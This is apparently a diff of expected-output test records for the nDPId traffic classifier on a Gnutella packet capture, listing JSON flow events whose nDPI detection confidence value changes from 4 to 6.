00561{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":82065,"flow_last_seen":82065,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.134.139.39","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":89829,"flow_last_seen":174528,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.84.178.16","src_port":28681,"dst_port":60262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":89829,"flow_last_seen":174528,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"181.84.178.16","src_port":28681,"dst_port":60262,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":166,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82059,"flow_last_seen":251735,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"90.59.253.186","src_port":28681,"dst_port":15555,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82062,"flow_last_seen":251737,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"91.172.15.182","src_port":28681,"dst_port":37829,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00563{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82062,"flow_last_seen":191703,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.239.62.213","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
-00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90005,"flow_last_seen":243646,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4494,"flow_avg_l4_payload_len":321,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90072,"flow_last_seen":163183,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.26.216.95","src_port":28681,"dst_port":13889,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90005,"flow_last_seen":243646,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4494,"flow_avg_l4_payload_len":321,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"88.120.73.215","src_port":28681,"dst_port":24562,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90072,"flow_last_seen":163183,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.26.216.95","src_port":28681,"dst_port":13889,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":195,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":82063,"flow_last_seen":253025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"177.231.151.16","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00563{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":83520,"flow_last_seen":253025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.30.86.144","src_port":28681,"dst_port":53821,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90184,"flow_last_seen":180130,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3575,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00802{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":265,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90184,"flow_last_seen":180130,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3575,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"203.220.198.244","src_port":28681,"dst_port":1194,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00570{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":304,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":90880,"flow_last_seen":251799,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5105,"flow_avg_l4_payload_len":283,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"193.32.126.214","src_port":28681,"dst_port":59596,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82063,"flow_last_seen":251735,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"190.153.143.54","src_port":28681,"dst_port":65535,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":172,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82060,"flow_last_seen":253024,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"87.69.142.133","src_port":28681,"dst_port":15471,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":88941,"flow_last_seen":179376,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":86,"flow_tot_l4_payload_len":511,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"75.133.101.93","src_port":28681,"dst_port":52367,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90073,"flow_last_seen":174761,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3575,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
-00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89967,"flow_last_seen":152618,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90072,"flow_last_seen":180633,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5191,"flow_avg_l4_payload_len":370,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":90073,"flow_last_seen":174761,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3575,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"46.128.114.107","src_port":28681,"dst_port":6578,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89967,"flow_last_seen":152618,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"185.203.218.92","src_port":28681,"dst_port":56962,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00803{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":90072,"flow_last_seen":180633,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":5191,"flow_avg_l4_payload_len":370,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"103.232.107.100","src_port":28681,"dst_port":43508,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00570{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":300,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":90809,"flow_last_seen":139723,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1817,"flow_avg_l4_payload_len":227,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"104.238.172.250","src_port":28681,"dst_port":23548,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00562{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82062,"flow_last_seen":191700,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"92.88.92.56","src_port":28681,"dst_port":21009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00565{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82063,"flow_last_seen":251737,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"165.169.195.227","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":89966,"flow_last_seen":180691,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90039,"flow_last_seen":163151,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":50297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe 
Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89966,"flow_last_seen":152619,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.218","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00801{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":89966,"flow_last_seen":180691,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":4383,"flow_avg_l4_payload_len":365,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"51.68.153.214","src_port":28681,"dst_port":26253,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90039,"flow_last_seen":163151,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.246.156.126","src_port":28681,"dst_port":50297,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00796{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":89966,"flow_last_seen":152619,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"45.88.117.218","src_port":28681,"dst_port":6909,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":173,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82060,"flow_last_seen":192907,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"121.99.222.36","src_port":28681,"dst_port":44988,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00563{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":180,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82061,"flow_last_seen":132833,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"66.131.24.72","src_port":28681,"dst_port":30711,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90039,"flow_last_seen":163151,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 
+00798{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":90039,"flow_last_seen":163151,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":243,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"82.181.251.218","src_port":28681,"dst_port":36368,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00564{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":156,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":82057,"flow_last_seen":253025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":72,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.244.228.86","src_port":28681,"dst_port":10131,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00561{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":176,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":82061,"flow_last_seen":253025,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"41.99.164.4","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00569{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":303,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":90871,"flow_last_seen":251762,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":1247,"flow_avg_l4_payload_len":207,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"142.132.165.13","src_port":28681,"dst_port":30566,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00800{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":4064,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":89829,"flow_last_seen":174144,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":727,"flow_tot_l4_payload_len":3570,"flow_avg_l4_payload_len":357,"midstream":0,"thread_ts_msec":272055,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"96.65.68.194","src_port":28681,"dst_port":35481,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": 